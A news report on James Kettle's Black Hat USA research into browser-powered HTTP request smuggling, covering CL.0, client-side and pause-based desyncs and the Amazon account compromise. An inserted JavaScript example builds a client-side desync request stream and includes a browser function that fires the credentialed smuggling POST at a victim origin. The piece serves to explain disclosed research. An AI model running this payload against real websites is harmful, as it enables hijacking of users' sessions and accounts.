Browser-powered desync: Black Hat USA presents a new class of HTTP request smuggling attacks
Renowned researcher James Kettle demonstrates his latest attack technique in Las Vegas.

A new class of HTTP request smuggling attack allowed a security researcher to compromise multiple popular websites including Amazon and Akamai, break TLS, and exploit Apache servers.

Speaking at Black Hat USA yesterday (August 10), James Kettle unveiled research that opens a new frontier in HTTP request smuggling: browser-powered desync attacks.

The briefing and its whitepaper, titled ‘Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling’, build on Kettle’s previous research into desync attacks.


Traditional desync attacks poison the connection between a front-end and a back-end server, and are therefore impossible against websites that do not use a front-end/back-end architecture.

However this new technique causes a desync between the front-end and the browser, allowing an attacker to “craft high-severity exploits without relying on malformed requests that browsers will never send”, Kettle noted.

This can expose a whole new range of websites to server-side request smuggling and enables an attacker to perform client-side variations of these attacks by inducing a victim’s browser to poison its own connection to a vulnerable web server.

Kettle demonstrated how he was able to turn a victim’s web browser into a desync delivery platform, shifting the request smuggling frontier by exposing single-server websites and internal networks.

He was able to combine cross-domain requests with server flaws to poison browser connection pools, install backdoors, and release desync worms – in turn compromising targets including Amazon, Apache, Akamai, Varnish, and multiple web VPNs.

Discovery

Kettle told attendees at the 25th anniversary edition of the annual hacking conference that four separate vulnerabilities led to the discovery of browser-powered desync attacks.

The first, first-request validation, is a flaw in which a reverse proxy checks the Host header only on the first request it receives on a client connection. An attacker sends a first request with a permitted Host header and then, down the same connection, a second request whose Host header names a host that would otherwise be refused; because the proxy validated only the first Host, the second request gets through.

The second, first-request routing, is a closely related flaw: the front-end uses the first request’s Host header to decide which back-end to route to, and then sends every subsequent request on that client connection down the same back-end connection, whatever Host header those later requests carry.

Kettle also described a technique for detecting connection-locked request smuggling, where the front-end ties each client connection to its own back-end connection: send a request whose Content-Length and Transfer-Encoding headers disagree about where the body ends, then read the response early, before the server’s own timeout, to learn which header the front-end honours.

If the front-end is using the Content-Length it keeps waiting for body bytes that never arrive and the read times out; if it is using Transfer-Encoding it answers straight away. That timing difference distinguishes connection-locked HTTP/1 request smuggling from harmless HTTP pipelining.

A fourth vulnerability caused a desync known as CL.0 (H2.0 in its HTTP/2 form). Kettle used it to compromise Amazon users’ accounts: he was able to steal users’ requests and have them saved into his own shopping list. He could capture all of their requests, including tokens that would have enabled him to impersonate those users.

Speaking to Daily Swig, Kettle said: “I was really surprised that it was possible to cause a CL.0 desync and also a client-side desync using a legitimate, valid HTTP request.

“It’s understandable when servers get confused by requests that use header obfuscation to hit edge-cases, but getting desync’d by a completely valid, RFC-compliant HTTP request is something else.”

‘Much cooler’ exploit

Kettle reported this issue to Amazon, which fixed it, but he soon realized that he had “made a terrible mistake and missed out on a much cooler potential exploit”.

“The attack request was so vanilla that I could have made anyone’s web browser issue it using fetch(),” Kettle noted in the whitepaper.

“By using the HEAD technique on Amazon to create an XSS gadget and execute JavaScript in victims’ browsers, I could have made each infected victim re-launch the attack themselves, spreading it to numerous others.

“This would have released a desync worm – a self-replicating attack which exploits victims to infect others with no user-interaction, rapidly exploiting every active user on Amazon.

“I wouldn’t advise attempting this on a production system, but it could be fun to try on a staging environment. Ultimately this browser-powered desync was a cool finding, a missed opportunity, and also a hint at a new attack class.”


Most server-side desyncs can only be triggered by a custom HTTP client issuing a malformed request, but as Kettle proved with Amazon, it is sometimes possible to create a browser-powered server-side desync.

This enables exploitation of single-server websites, which Kettle noted “is valuable because they’re often spectacularly poor at HTTP parsing”.

“A client-side desync attack starts with the victim visiting the attacker’s website, which then makes their browser send two cross-domain requests to the vulnerable website,” Kettle explained.

“The first request is crafted to desync the browser’s connection and make the second request trigger a harmful response, typically giving the attacker control of the victim’s account.”
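To make that mechanism concrete, here is an added example, constructed for this page rather than taken from Kettle’s whitepaper or from any vulnerable site. It serialises the two cross-domain requests the victim’s browser would send on one keep-alive connection, then reads the resulting byte stream the way a flawed server does (answering the first request without consuming its body) beside the way a correct server does. The host `victim.example`, the `/redirect` endpoint, the `/hopefully404` path and the cookie value are hypothetical.

```javascript
// Hypothetical target and a detection payload in the style of Kettle's
// "GET /hopefully404" probe. SMUGGLED deliberately has no terminating CRLFCRLF:
// the victim's own next request will complete it.
const VICTIM_HOST = 'victim.example';
const SMUGGLED = 'GET /hopefully404 HTTP/1.1\r\nFoo: x';

// Approximate wire form of a fetch() made with credentials:'include' (cookie
// attached). Real browsers add more headers; they do not change the outcome.
function serialiseFetch(host, path, { method = 'GET', body = '' } = {}) {
  const lines = [`${method} ${path} HTTP/1.1`, `Host: ${host}`, 'Cookie: session=victim-cookie'];
  if (body) {
    lines.push('Content-Type: text/plain;charset=UTF-8',
               `Content-Length: ${Buffer.byteLength(body, 'latin1')}`);
  }
  return lines.join('\r\n') + '\r\n\r\n' + body;
}

// The bytes the two browser requests leave on the shared connection:
// a POST whose body is the smuggled prefix, then a normal GET /.
function attackStream() {
  return serialiseFetch(VICTIM_HOST, '/redirect', { method: 'POST', body: SMUGGLED }) +
         serialiseFetch(VICTIM_HOST, '/');
}

// Reads consecutive requests off one connection. readBody:false models a
// server that responds without consuming the request body (the CL.0-style
// flaw): the body bytes stay in the stream and are parsed as the next request.
// readBody:true is the correct behaviour, honouring Content-Length.
function parseRequestStream(stream, { readBody }) {
  const requests = [];
  let pos = 0;
  while (pos < stream.length) {
    const headEnd = stream.indexOf('\r\n\r\n', pos);
    if (headEnd === -1) {  // leftover bytes that never became a full request
      requests.push({ requestLine: stream.slice(pos), headers: {}, body: '', incomplete: true });
      break;
    }
    const lines = stream.slice(pos, headEnd).split('\r\n');
    const headers = {};
    for (const l of lines.slice(1)) {
      const i = l.indexOf(':');
      if (i > 0) headers[l.slice(0, i).trim().toLowerCase()] = l.slice(i + 1).trim();
    }
    const bodyLen = readBody ? Number(headers['content-length'] || 0) : 0;
    pos = headEnd + 4;
    requests.push({ requestLine: lines[0], headers, body: stream.slice(pos, pos + bodyLen) });
    pos += bodyLen;
  }
  return requests;
}

// Browser side: what the attacker's page runs in the victim's browser (not
// executed by this script). mode:'no-cors' lets the cross-origin POST leave
// with an arbitrary text body; credentials:'include' sends the victim's cookies
// and keeps the request in the credentialed pool, so the follow-up navigation
// is eligible to reuse the same, now poisoned, connection.
async function launchFromBrowser(origin) {
  await fetch(origin + '/redirect', {
    method: 'POST', body: SMUGGLED, mode: 'no-cors', credentials: 'include',
  });
  window.location = origin + '/';
}
```

Run it with `node`. With `readBody: false` the second request the server sees is the attacker’s `GET /hopefully404`, the genuine `GET / HTTP/1.1` line is swallowed into the `Foo` header, and the victim’s `Cookie` header lands on the attacker-chosen request; with `readBody: true` the smuggled text is simply the POST body and the second request is the real `GET /`.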


Kettle also demonstrated a pause-based desync attack, which works against a server that times out while waiting for the rest of a request but does not close the connection. The attacker sends the first half of the request and pauses; the server times out but leaves the socket open, so when the attacker sends the second half it is parsed as a new request.

He also showed a client-side pause-based desync attack. Acting as a manipulator-in-the-middle (MitM) on the TLS connection, he made no attempt to decrypt the traffic; instead he simply delayed delivery whenever a packet of a specific size was seen, and that delay alone was enough to trigger a pause-based desync from the victim’s browser, which he carried out successfully against Apache.

He also automated detection of these client-side desyncs and identified a range of real vulnerable websites, including Akamai, Cisco’s web VPN, and Pulse Secure’s VPN.

Kettle told Daily Swig that he plans to do a few follow-up research drops continuing the request smuggling theme over the next couple of months, but that his next major research project “will target something entirely different”.

